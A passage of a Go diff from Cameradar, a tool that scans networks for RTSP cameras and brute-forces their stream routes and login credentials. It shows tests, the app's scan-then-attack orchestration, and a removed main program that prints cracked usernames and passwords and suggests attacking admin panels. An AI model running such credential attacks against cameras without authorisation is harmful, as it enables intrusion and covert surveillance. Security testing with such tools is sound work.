Port: 1337,
|
||||
Available: true,
|
||||
}
|
||||
|
||||
unavailableStream := Stream{
|
||||
Device: "fakeDevice",
|
||||
Available: false,
|
||||
}
|
||||
|
||||
fakeTargets := []Stream{validStream1, validStream2}
|
||||
unavailableTargets := []Stream{unavailableStream}
|
||||
|
||||
testCases := []struct {
|
||||
desc string
|
||||
|
||||
targets []Stream
|
||||
timeout time.Duration
|
||||
log bool
|
||||
|
||||
status int
|
||||
|
||||
performErr error
|
||||
getInfoErr error
|
||||
|
||||
expectedStreams []Stream
|
||||
expectedErrMsg string
|
||||
}{
|
||||
// Route found
|
||||
{
|
||||
desc: "route found",
|
||||
|
||||
targets: fakeTargets,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
status: 403,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Route found
|
||||
{
|
||||
desc: "route found",
|
||||
|
||||
targets: fakeTargets,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
status: 401,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Camera accessed
|
||||
{
|
||||
desc: "camera accessed",
|
||||
|
||||
targets: fakeTargets,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
status: 200,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Unavailable stream
|
||||
{
|
||||
desc: "unavailable stream",
|
||||
|
||||
targets: unavailableTargets,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
status: 400,
|
||||
|
||||
expectedStreams: unavailableTargets,
|
||||
},
|
||||
// curl perform fails
|
||||
{
|
||||
desc: "curl perform fails",
|
||||
|
||||
targets: fakeTargets,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
performErr: errors.New("dummy error"),
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// curl getinfo fails
|
||||
{
|
||||
desc: "curl getinfo fails",
|
||||
|
||||
targets: fakeTargets,
|
||||
timeout: 1 * time.Millisecond,
|
||||
|
||||
getInfoErr: errors.New("dummy error"),
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Logs disabled
|
||||
{
|
||||
desc: "logs disabled",
|
||||
|
||||
targets: fakeTargets,
|
||||
timeout: 1 * time.Millisecond,
|
||||
log: false,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
// Logs enabled
|
||||
{
|
||||
desc: "logs enabled",
|
||||
|
||||
targets: fakeTargets,
|
||||
timeout: 1 * time.Millisecond,
|
||||
log: true,
|
||||
|
||||
expectedStreams: fakeTargets,
|
||||
},
|
||||
}
|
||||
for i, tC := range testCases {
|
||||
t.Run(tC.desc, func(t *testing.T) {
|
||||
curlerMock := &CurlerMock{}
|
||||
|
||||
curlerMock.On("Setopt", mock.Anything, mock.Anything).Return(nil)
|
||||
curlerMock.On("Perform").Return(tC.performErr)
|
||||
if tC.performErr == nil {
|
||||
curlerMock.On("Getinfo", mock.Anything).Return(tC.status, tC.getInfoErr)
|
||||
}
|
||||
|
||||
results, err := ValidateStreams(curlerMock, tC.targets, tC.timeout, tC.log)
|
||||
|
||||
if len(tC.expectedErrMsg) > 0 {
|
||||
if err == nil {
|
||||
fmt.Printf("unexpected success in ValidateStream test, iteration %d. expected error: %s\n", i, tC.expectedErrMsg)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
assert.Contains(t, err.Error(), tC.expectedErrMsg, "wrong error message")
|
||||
} else {
|
||||
if err != nil {
|
||||
fmt.Printf("unexpected error in ValidateStream test, iteration %d: %v\n", i, err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
for _, stream := range tC.expectedStreams {
|
||||
foundStream := false
|
||||
for _, result := range results {
|
||||
if result.Address == stream.Address && result.Device == stream.Device && result.Port == stream.Port {
|
||||
foundStream = true
|
||||
}
|
||||
}
|
||||
|
||||
assert.Equal(t, true, foundStream, "wrong streams parsed")
|
||||
}
|
||||
}
|
||||
|
||||
assert.Equal(t, len(tC.expectedStreams), len(results), "wrong streams parsed")
|
||||
|
||||
curlerMock.AssertExpectations(t)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestDoNotWrite(t *testing.T) {
|
||||
assert.Equal(t, true, doNotWrite(nil, nil))
|
||||
}
|
||||
@@ -0,0 +1,78 @@
|
||||
package cameradar
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
)
|
||||
|
||||
// Reporter reports progress and results of the application.
|
||||
type Reporter interface {
|
||||
Start(step Step, message string)
|
||||
Done(step Step, message string)
|
||||
Error(step Step, err error)
|
||||
Summary(streams []Stream, err error)
|
||||
}
|
||||
|
||||
// App scans one or more targets and attacks all RTSP streams found to get their credentials.
|
||||
type App struct {
|
||||
streamScanner StreamScanner
|
||||
attacker StreamAttacker
|
||||
reporter Reporter
|
||||
|
||||
targets []string
|
||||
ports []string
|
||||
}
|
||||
|
||||
// StreamScanner discovers RTSP streams for the given inputs.
|
||||
type StreamScanner interface {
|
||||
Scan(ctx context.Context) ([]Stream, error)
|
||||
}
|
||||
|
||||
// StreamAttacker attacks streams to discover routes and credentials.
|
||||
type StreamAttacker interface {
|
||||
Attack(ctx context.Context, streams []Stream) ([]Stream, error)
|
||||
}
|
||||
|
||||
// New creates a new App with explicit dependencies.
|
||||
func New(streamScanner StreamScanner, attacker StreamAttacker, targets, ports []string, reporter Reporter) (*App, error) {
|
||||
if streamScanner == nil {
|
||||
return nil, errors.New("stream scanner is required")
|
||||
}
|
||||
if attacker == nil {
|
||||
return nil, errors.New("stream attacker is required")
|
||||
}
|
||||
|
||||
app := &App{
|
||||
streamScanner: streamScanner,
|
||||
attacker: attacker,
|
||||
targets: targets,
|
||||
ports: ports,
|
||||
reporter: reporter,
|
||||
}
|
||||
|
||||
return app, nil
|
||||
}
|
||||
|
||||
// Run runs the scan and prints the results.
|
||||
func (a *App) Run(ctx context.Context) error {
|
||||
a.reporter.Start(StepScan, "Scanning targets for RTSP streams")
|
||||
streams, err := a.streamScanner.Scan(ctx)
|
||||
if err != nil {
|
||||
wrapped := fmt.Errorf("discovering devices: %w", err)
|
||||
a.reporter.Error(StepScan, wrapped)
|
||||
a.reporter.Summary(streams, wrapped)
|
||||
return wrapped
|
||||
}
|
||||
a.reporter.Done(StepScan, "Scan complete")
|
||||
|
||||
streams, err = a.attacker.Attack(ctx, streams)
|
||||
if err != nil {
|
||||
wrapped := fmt.Errorf("attacking devices: %w", err)
|
||||
a.reporter.Summary(streams, wrapped)
|
||||
return wrapped
|
||||
}
|
||||
|
||||
a.reporter.Summary(streams, nil)
|
||||
return nil
|
||||
}
|
||||
@@ -1,252 +0,0 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"os"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/cameradar"
|
||||
|
||||
curl "github.com/andelf/go-curl"
|
||||
"github.com/fatih/color"
|
||||
"github.com/gernest/wow"
|
||||
"github.com/gernest/wow/spin"
|
||||
"github.com/spf13/pflag"
|
||||
"github.com/spf13/viper"
|
||||
)
|
||||
|
||||
type options struct {
|
||||
Targets []string
|
||||
Ports []string
|
||||
Routes string
|
||||
Credentials string
|
||||
Speed int
|
||||
Timeout int
|
||||
EnableLogs bool
|
||||
}
|
||||
|
||||
func parseArguments() error {
|
||||
|
||||
viper.SetEnvPrefix("cameradar")
|
||||
viper.BindEnv("targets")
|
||||
viper.BindEnv("ports")
|
||||
viper.BindEnv("custom-routes")
|
||||
viper.BindEnv("custom-credentials")
|
||||
viper.BindEnv("speed")
|
||||
viper.BindEnv("timeout")
|
||||
viper.BindEnv("logging")
|
||||
|
||||
pflag.StringSliceP("targets", "t", nil, "The targets on which to scan for open RTSP streams - required (ex: 172.16.100.0/24)")
|
||||
pflag.StringSliceP("ports", "p", []string{"554", "5554", "8554"}, "The ports on which to search for RTSP streams")
|
||||
pflag.StringP("custom-routes", "r", "<GOPATH>/src/github.com/Ullaakut/cameradar/dictionaries/routes", "The path on which to load a custom routes dictionary")
|
||||
pflag.StringP("custom-credentials", "c", "<GOPATH>/src/github.com/Ullaakut/cameradar/dictionaries/credentials.json", "The path on which to load a custom credentials JSON dictionary")
|
||||
pflag.IntP("speed", "s", 4, "The nmap speed preset to use for discovery")
|
||||
pflag.IntP("timeout", "T", 2000, "The timeout in miliseconds to use for attack attempts")
|
||||
pflag.BoolP("log", "l", false, "Enable the logs for nmap's output to stdout")
|
||||
pflag.BoolP("help", "h", false, "displays this help message")
|
||||
|
||||
viper.AutomaticEnv()
|
||||
|
||||
pflag.Parse()
|
||||
|
||||
err := viper.BindPFlags(pflag.CommandLine)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
if viper.GetBool("help") {
|
||||
pflag.Usage()
|
||||
fmt.Println("\nExamples of usage:")
|
||||
fmt.Println("\tScanning your home network for RTSP streams:\tcameradar -t 192.168.0.0/24")
|
||||
fmt.Println("\tScanning a remote camera on a specific port:\tcameradar -t 172.178.10.14 -p 18554 -s 2")
|
||||
fmt.Println("\tScanning an unstable remote network: \t\tcameradar -t 172.178.10.14/24 -s 1 --timeout 10000 -l")
|
||||
os.Exit(0)
|
||||
}
|
||||
|
||||
if viper.GetStringSlice("targets") == nil {
|
||||
return errors.New("targets (-t, --targets) argument required\n examples:\n - 172.16.100.0/24\n - localhost\n - 8.8.8.8")
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func main() {
|
||||
var options options
|
||||
|
||||
err := parseArguments()
|
||||
if err != nil {
|
||||
printErr(err)
|
||||
}
|
||||
|
||||
options.Credentials = viper.GetString("custom-credentials")
|
||||
options.EnableLogs = viper.GetBool("log") || viper.GetBool("logging")
|
||||
options.Ports = viper.GetStringSlice("ports")
|
||||
options.Routes = viper.GetString("custom-routes")
|
||||
options.Speed = viper.GetInt("speed")
|
||||
options.Timeout = viper.GetInt("timeout")
|
||||
options.Targets = viper.GetStringSlice("targets")
|
||||
|
||||
w := startSpinner(options.EnableLogs)
|
||||
|
||||
if len(options.Targets) == 1 {
|
||||
options.Targets, err = cmrdr.ParseTargetsFile(options.Targets[0])
|
||||
if err != nil {
|
||||
printErr(err)
|
||||
}
|
||||
}
|
||||
|
||||
err = curl.GlobalInit(curl.GLOBAL_ALL)
|
||||
handle := curl.EasyInit()
|
||||
if err != nil || handle == nil {
|
||||
printErr(errors.New("libcurl initialization failed"))
|
||||
}
|
||||
|
||||
c := &cmrdr.Curl{CURL: handle}
|
||||
defer curl.GlobalCleanup()
|
||||
|
||||
updateSpinner(w, "Loading dictionaries...", options.EnableLogs)
|
||||
gopath := os.Getenv("GOPATH")
|
||||
options.Credentials = strings.Replace(options.Credentials, "<GOPATH>", gopath, 1)
|
||||
options.Routes = strings.Replace(options.Routes, "<GOPATH>", gopath, 1)
|
||||
|
||||
credentials, err := cmrdr.LoadCredentials(options.Credentials)
|
||||
if err != nil {
|
||||
color.Red("Invalid credentials dictionary: %s", err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
routes, err := cmrdr.LoadRoutes(options.Routes)
|
||||
if err != nil {
|
||||
color.Red("Invalid routes dictionary: %s", err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
updateSpinner(w, "Scanning the network...", options.EnableLogs)
|
||||
streams, err := cmrdr.Discover(options.Targets, options.Ports, options.Speed)
|
||||
if err != nil && len(streams) > 0 {
|
||||
printErr(err)
|
||||
}
|
||||
|
||||
// Most cameras will be accessed successfully with these two attacks
|
||||
updateSpinner(w, "Found "+fmt.Sprint(len(streams))+" streams. Attacking their routes...", options.EnableLogs)
|
||||
streams, err = cmrdr.AttackRoute(c, streams, routes, time.Duration(options.Timeout)*time.Millisecond, options.EnableLogs)
|
||||
if err != nil && len(streams) > 0 {
|
||||
printErr(err)
|
||||
}
|
||||
|
||||
updateSpinner(w, "Found "+fmt.Sprint(len(streams))+" streams. Attacking their credentials...", options.EnableLogs)
|
||||
streams, err = cmrdr.AttackCredentials(c, streams, credentials, time.Duration(options.Timeout)*time.Millisecond, options.EnableLogs)
|
||||
if err != nil && len(streams) > 0 {
|
||||
printErr(err)
|
||||
}
|
||||
|
||||
// But some cameras run GST RTSP Server which prioritizes 401 over 404 contrary to most cameras.
|
||||
// For these cameras, running another route attack will solve the problem.
|
||||
for _, stream := range streams {
|
||||
if !stream.RouteFound || !stream.CredentialsFound {
|
||||
updateSpinner(w, "Found "+fmt.Sprint(len(streams))+" streams. Final attack...", options.EnableLogs)
|
||||
streams, err = cmrdr.AttackRoute(c, streams, routes, time.Duration(options.Timeout)*time.Millisecond, options.EnableLogs)
|
||||
if err != nil && len(streams) > 0 {
|
||||
printErr(err)
|
||||
}
|
||||
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
updateSpinner(w, "Found "+fmt.Sprint(len(streams))+" streams. Validating their availability...", options.EnableLogs)
|
||||
streams, err = cmrdr.ValidateStreams(c, streams, time.Duration(options.Timeout)*time.Millisecond, options.EnableLogs)
|
||||
if err != nil && len(streams) > 0 {
|
||||
printErr(err)
|
||||
}
|
||||
|
||||
clearOutput(w, options.EnableLogs)
|
||||
|
||||
prettyPrint(streams)
|
||||
}
|
||||
|
||||
func prettyPrint(streams []cmrdr.Stream) {
|
||||
yellow := color.New(color.FgYellow, color.Bold, color.Underline).SprintFunc()
|
||||
blue := color.New(color.FgBlue, color.Underline).SprintFunc()
|
||||
green := color.New(color.FgGreen, color.Bold).SprintFunc()
|
||||
red := color.New(color.FgRed, color.Bold).SprintFunc()
|
||||
white := color.New(color.Italic).SprintFunc()
|
||||
|
||||
success := 0
|
||||
|
||||
if len(streams) > 0 {
|
||||
for _, stream := range streams {
|
||||
if stream.CredentialsFound && stream.RouteFound && stream.Available {
|
||||
fmt.Printf("%s\tDevice RTSP URL:\t%s\n", green("\xE2\x96\xB6"), blue(cmrdr.GetCameraRTSPURL(stream)))
|
||||
success++
|
||||
} else {
|
||||
fmt.Printf("%s\tAdmin panel URL:\t%s %s\n", red("\xE2\x96\xB6"), yellow(cmrdr.GetCameraAdminPanelURL(stream)), white("You can use this URL to try attacking the camera's admin panel instead."))
|
||||
}
|
||||
|
||||
fmt.Printf("\tDevice model:\t\t%s\n\n", stream.Device)
|
||||
|
||||
if stream.Available {
|
||||
fmt.Printf("\tAvailable:\t\t%s\n", green("yes"))
|
||||
} else {
|
||||
fmt.Printf("\tAvailable:\t\t%s\n", red("no"))
|
||||
}
|
||||
|
||||
fmt.Printf("\tIP address:\t\t%s\n", stream.Address)
|
||||
fmt.Printf("\tRTSP port:\t\t%d\n", stream.Port)
|
||||
if stream.CredentialsFound {
|
||||
fmt.Printf("\tUsername:\t\t%s\n", green(stream.Username))
|
||||
fmt.Printf("\tPassword:\t\t%s\n", green(stream.Password))
|
||||
} else {
|
||||
fmt.Printf("\tUsername:\t\t%s\n", red("not found"))
|
||||
fmt.Printf("\tPassword:\t\t%s\n", red("not found"))
|
||||
}
|
||||
if stream.RouteFound {
|
||||
fmt.Printf("\tRTSP route:\t\t%s\n\n\n", green("/"+stream.Route))
|
||||
} else {
|
||||
fmt.Printf("\tRTSP route:\t\t%s\n\n\n", red("not found"))
|
||||
}
|
||||
}
|
||||
if success > 1 {
|
||||
fmt.Printf("%s Successful attack: %s devices were accessed", green("\xE2\x9C\x94"), green(len(streams)))
|
||||
} else if success == 1 {
|
||||
fmt.Printf("%s Successful attack: %s device was accessed", green("\xE2\x9C\x94"), green(len(streams)))
|
||||
} else {
|
||||
fmt.Printf("%s Streams were found but none were accessed. They are most likely configured with secure credentials and routes. You can try adding entries to the dictionary or generating your own in order to attempt a bruteforce attack on the cameras.\n", red("\xE2\x9C\x96"))
|
||||
}
|
||||
} else {
|
||||
fmt.Printf("%s No streams were found. Please make sure that your target is on an accessible network.\n", red("\xE2\x9C\x96"))
|
||||
}
|
||||
}
|
||||
|
||||
func printErr(err error) {
|
||||
red := color.New(color.FgRed, color.Bold).SprintFunc()
|
||||
fmt.Printf("%s %v\n", red("\xE2\x9C\x96"), err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
func updateSpinner(w *wow.Wow, text string, disabled bool) {
|
||||
if !disabled {
|
||||
w.Text(" " + text)
|
||||
}
|
||||
}
|
||||
|
||||
func startSpinner(disabled bool) *wow.Wow {
|
||||
if !disabled {
|
||||
w := wow.New(os.Stdout, spin.Get(spin.Dots), " Loading dictionaries...")
|
||||
w.Start()
|
||||
return w
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// HACK: Waiting for a fix to issue
|
||||
// https://github.com/gernest/wow/issues/5
|
||||
func clearOutput(w *wow.Wow, disabled bool) {
|
||||
if !disabled {
|
||||
w.Text("\b")
|
||||
time.Sleep(80 * time.Millisecond)
|
||||
w.Stop()
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,230 @@
|
||||
package cameradar_test
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"sync"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestNew(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
scanner cameradar.StreamScanner
|
||||
attacker cameradar.StreamAttacker
|
||||
wantErr require.ErrorAssertionFunc
|
||||
wantMsg string
|
||||
}{
|
||||
{
|
||||
name: "missing scanner",
|
||||
scanner: nil,
|
||||
attacker: &fakeAttacker{},
|
||||
wantErr: require.Error,
|
||||
wantMsg: "stream scanner is required",
|
||||
},
|
||||
{
|
||||
name: "missing attacker",
|
||||
scanner: &fakeScanner{},
|
||||
attacker: nil,
|
||||
wantErr: require.Error,
|
||||
wantMsg: "stream attacker is required",
|
||||
},
|
||||
{
|
||||
name: "valid",
|
||||
scanner: &fakeScanner{},
|
||||
attacker: &fakeAttacker{},
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
app, err := cameradar.New(test.scanner, test.attacker, []string{"target"}, []string{"554"}, &recordingReporter{})
|
||||
test.wantErr(t, err)
|
||||
if test.wantMsg != "" {
|
||||
assert.ErrorContains(t, err, test.wantMsg)
|
||||
}
|
||||
if err == nil {
|
||||
require.NotNil(t, app)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestApp_Run(t *testing.T) {
|
||||
ctx := t.Context()
|
||||
streams := []cameradar.Stream{{Port: 554}}
|
||||
attacked := []cameradar.Stream{{Port: 8554}}
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
scanner *fakeScanner
|
||||
attacker *fakeAttacker
|
||||
wantErrContains string
|
||||
wantErrorCalls int
|
||||
wantDoneCalls int
|
||||
wantSummaryErr string
|
||||
wantSummary []cameradar.Stream
|
||||
}{
|
||||
{
|
||||
name: "success",
|
||||
scanner: &fakeScanner{
|
||||
streams: streams,
|
||||
},
|
||||
attacker: &fakeAttacker{
|
||||
streams: attacked,
|
||||
},
|
||||
wantDoneCalls: 1,
|
||||
wantSummary: attacked,
|
||||
wantSummaryErr: "",
|
||||
},
|
||||
{
|
||||
name: "scan error",
|
||||
scanner: &fakeScanner{
|
||||
streams: streams,
|
||||
err: errors.New("scan failed"),
|
||||
},
|
||||
attacker: &fakeAttacker{},
|
||||
wantErrContains: "discovering devices",
|
||||
wantErrorCalls: 1,
|
||||
wantSummary: streams,
|
||||
wantSummaryErr: "discovering devices",
|
||||
},
|
||||
{
|
||||
name: "attack error",
|
||||
scanner: &fakeScanner{
|
||||
streams: streams,
|
||||
},
|
||||
attacker: &fakeAttacker{
|
||||
err: errors.New("attack failed"),
|
||||
},
|
||||
wantErrContains: "attacking devices",
|
||||
wantDoneCalls: 1,
|
||||
wantSummary: streams,
|
||||
wantSummaryErr: "attacking devices",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
reporter := &recordingReporter{}
|
||||
scanner := test.scanner
|
||||
attacker := test.attacker
|
||||
|
||||
app, err := cameradar.New(scanner, attacker, []string{"target"}, []string{"554"}, reporter)
|
||||
require.NoError(t, err)
|
||||
|
||||
err = app.Run(ctx)
|
||||
if test.wantErrContains != "" {
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, test.wantErrContains)
|
||||
} else {
|
||||
require.NoError(t, err)
|
||||
}
|
||||
|
||||
assert.Equal(t, 1, scanner.calls)
|
||||
assert.Same(t, ctx, scanner.gotCtx)
|
||||
|
||||
if test.wantErrContains == "discovering devices" {
|
||||
assert.Equal(t, 0, attacker.calls)
|
||||
} else {
|
||||
assert.Equal(t, 1, attacker.calls)
|
||||
assert.Equal(t, streams, attacker.gotStreams)
|
||||
}
|
||||
|
||||
assert.Equal(t, 1, reporter.startCalls)
|
||||
assert.Equal(t, test.wantDoneCalls, reporter.doneCalls)
|
||||
assert.Equal(t, test.wantErrorCalls, reporter.errorCalls)
|
||||
require.Equal(t, 1, reporter.summaryCalls)
|
||||
assert.Equal(t, test.wantSummary, reporter.summaryStreams)
|
||||
if test.wantSummaryErr == "" {
|
||||
assert.NoError(t, reporter.summaryErr)
|
||||
} else {
|
||||
require.Error(t, reporter.summaryErr)
|
||||
assert.ErrorContains(t, reporter.summaryErr, test.wantSummaryErr)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
type fakeScanner struct {
|
||||
streams []cameradar.Stream
|
||||
err error
|
||||
|
||||
calls int
|
||||
gotCtx context.Context
|
||||
gotTargets []string
|
||||
gotPorts []string
|
||||
}
|
||||
|
||||
func (f *fakeScanner) Scan(ctx context.Context) ([]cameradar.Stream, error) {
|
||||
f.calls++
|
||||
f.gotCtx = ctx
|
||||
return f.streams, f.err
|
||||
}
|
||||
|
||||
type fakeAttacker struct {
|
||||
streams []cameradar.Stream
|
||||
err error
|
||||
|
||||
calls int
|
||||
gotStreams []cameradar.Stream
|
||||
}
|
||||
|
||||
func (f *fakeAttacker) Attack(_ context.Context, streams []cameradar.Stream) ([]cameradar.Stream, error) {
|
||||
f.calls++
|
||||
f.gotStreams = append([]cameradar.Stream(nil), streams...)
|
||||
if f.err != nil {
|
||||
return streams, f.err
|
||||
}
|
||||
if f.streams != nil {
|
||||
return f.streams, nil
|
||||
}
|
||||
return streams, nil
|
||||
}
|
||||
|
||||
type recordingReporter struct {
|
||||
mu sync.Mutex
|
||||
startCalls int
|
||||
doneCalls int
|
||||
errorCalls int
|
||||
summaryCalls int
|
||||
summaryStreams []cameradar.Stream
|
||||
summaryErr error
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Start(cameradar.Step, string) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.startCalls++
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Done(cameradar.Step, string) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.doneCalls++
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Progress(cameradar.Step, string) {}
|
||||
|
||||
func (r *recordingReporter) Debug(cameradar.Step, string) {}
|
||||
|
||||
func (r *recordingReporter) Error(cameradar.Step, error) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.errorCalls++
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Summary(streams []cameradar.Stream, err error) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.summaryCalls++
|
||||
r.summaryStreams = append([]cameradar.Stream(nil), streams...)
|
||||
r.summaryErr = err
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Close() {}
|
||||
@@ -0,0 +1,234 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
"os"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/attack"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/dict"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/output"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/scan"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/urfave/cli/v3"
|
||||
"golang.org/x/term"
|
||||
)
|
||||
|
||||
//nolint:cyclop // Splitting this function does not make it clearer.
|
||||
func runCameradar(ctx context.Context, cmd *cli.Command) error {
|
||||
ctx, cancel := context.WithCancel(ctx)
|
||||
defer cancel()
|
||||
|
||||
targetInputs := cmd.StringSlice(flagTargets)
|
||||
if len(targetInputs) == 0 {
|
||||
return errors.New("at least one target must be specified")
|
||||
}
|
||||
|
||||
targets, err := loadTargets(targetInputs)
|
||||
if err != nil {
|
||||
return fmt.Errorf("loading targets: %w", err)
|
||||
}
|
||||
if len(targets) == 0 {
|
||||
return errors.New("no valid targets provided")
|
||||
}
|
||||
|
||||
ports := cmd.StringSlice(flagPorts)
|
||||
if len(ports) == 0 {
|
||||
return errors.New("at least one port must be specified")
|
||||
}
|
||||
|
||||
var credsPath, routesPath string
|
||||
if cmd.IsSet(flagCustomCredentials) {
|
||||
credsPath = os.ExpandEnv(cmd.String(flagCustomCredentials))
|
||||
}
|
||||
if cmd.IsSet(flagCustomRoutes) {
|
||||
routesPath = os.ExpandEnv(cmd.String(flagCustomRoutes))
|
||||
}
|
||||
|
||||
dictionary, err := dict.New(credsPath, routesPath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("loading dictionaries: %w", err)
|
||||
}
|
||||
|
||||
mode, err := cameradar.ParseMode(cmd.String(flagUI))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
var outputPath string
|
||||
if cmd.IsSet(flagOutput) {
|
||||
outputPath = os.ExpandEnv(cmd.String(flagOutput))
|
||||
}
|
||||
|
||||
interactive := isInteractiveTerminal()
|
||||
buildInfo := ui.BuildInfo{Version: version, Commit: commit, Date: date}
|
||||
reporter, err := ui.NewReporter(mode, cmd.Bool(flagDebug), os.Stdout, interactive, buildInfo, cancel)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if plainReporter, ok := reporter.(*ui.PlainReporter); ok {
|
||||
resolvedMode := resolveMode(mode, interactive)
|
||||
plainReporter.PrintStartup(buildInfo, buildStartupOptions(
|
||||
targets,
|
||||
ports,
|
||||
routesPath,
|
||||
credsPath,
|
||||
outputPath,
|
||||
cmd.String(flagScanner),
|
||||
cmd.Int16(flagScanSpeed),
|
||||
cmd.Duration(flagAttackInterval),
|
||||
cmd.Duration(flagTimeout),
|
||||
cmd.Bool(flagSkipScan),
|
||||
cmd.Bool(flagDebug),
|
||||
resolvedMode,
|
||||
))
|
||||
}
|
||||
if outputPath != "" {
|
||||
reporter = output.NewM3UReporter(reporter, outputPath)
|
||||
}
|
||||
defer reporter.Close()
|
||||
|
||||
config := scan.Config{
|
||||
SkipScan: cmd.Bool(flagSkipScan),
|
||||
Targets: targets,
|
||||
Ports: ports,
|
||||
ScanSpeed: cmd.Int16(flagScanSpeed),
|
||||
Scanner: cmd.String(flagScanner),
|
||||
}
|
||||
var scanner cameradar.StreamScanner
|
||||
scanner, err = scan.New(config, reporter)
|
||||
if err != nil {
|
||||
return fmt.Errorf("creating stream scanner: %w", err)
|
||||
}
|
||||
|
||||
interval := cmd.Duration(flagAttackInterval)
|
||||
timeout := cmd.Duration(flagTimeout)
|
||||
attacker, err := attack.New(dictionary, interval, timeout, reporter)
|
||||
if err != nil {
|
||||
return fmt.Errorf("creating attacker: %w", err)
|
||||
}
|
||||
|
||||
c, err := cameradar.New(
|
||||
scanner,
|
||||
attacker,
|
||||
targets,
|
||||
ports,
|
||||
reporter,
|
||||
)
|
||||
if err != nil {
|
||||
return fmt.Errorf("creating scanner: %w", err)
|
||||
}
|
||||
|
||||
return c.Run(ctx)
|
||||
}
|
||||
|
||||
func resolveMode(mode cameradar.Mode, interactive bool) cameradar.Mode {
|
||||
if mode != cameradar.ModeAuto {
|
||||
return mode
|
||||
}
|
||||
if interactive {
|
||||
return cameradar.ModeTUI
|
||||
}
|
||||
return cameradar.ModePlain
|
||||
}
|
||||
|
||||
func buildStartupOptions(
|
||||
targets []string,
|
||||
ports []string,
|
||||
routesPath string,
|
||||
credsPath string,
|
||||
outputPath string,
|
||||
scanner string,
|
||||
scanSpeed int16,
|
||||
attackInterval time.Duration,
|
||||
timeout time.Duration,
|
||||
skipScan bool,
|
||||
debug bool,
|
||||
mode cameradar.Mode,
|
||||
) []string {
|
||||
options := []string{
|
||||
"targets: " + strings.Join(targets, ", "),
|
||||
"ports: " + strings.Join(ports, ", "),
|
||||
"custom-routes: " + fallbackValue(routesPath, "builtin"),
|
||||
"custom-credentials: " + fallbackValue(credsPath, "builtin"),
|
||||
"scanner: " + fallbackValue(scanner, "nmap"),
|
||||
"scan-speed: " + strconv.FormatInt(int64(scanSpeed), 10),
|
||||
"skip-scan: " + strconv.FormatBool(skipScan),
|
||||
"attack-interval: " + attackInterval.String(),
|
||||
"timeout: " + timeout.String(),
|
||||
"debug: " + strconv.FormatBool(debug),
|
||||
"ui: " + string(mode),
|
||||
"output: " + fallbackValue(outputPath, "disabled"),
|
||||
}
|
||||
return options
|
||||
}
|
||||
|
||||
func fallbackValue(value, fallback string) string {
|
||||
trimmed := strings.TrimSpace(value)
|
||||
if trimmed == "" {
|
||||
return fallback
|
||||
}
|
||||
return trimmed
|
||||
}
|
||||
|
||||
func isInteractiveTerminal() bool {
|
||||
if !term.IsTerminal(int(os.Stdout.Fd())) {
|
||||
return false
|
||||
}
|
||||
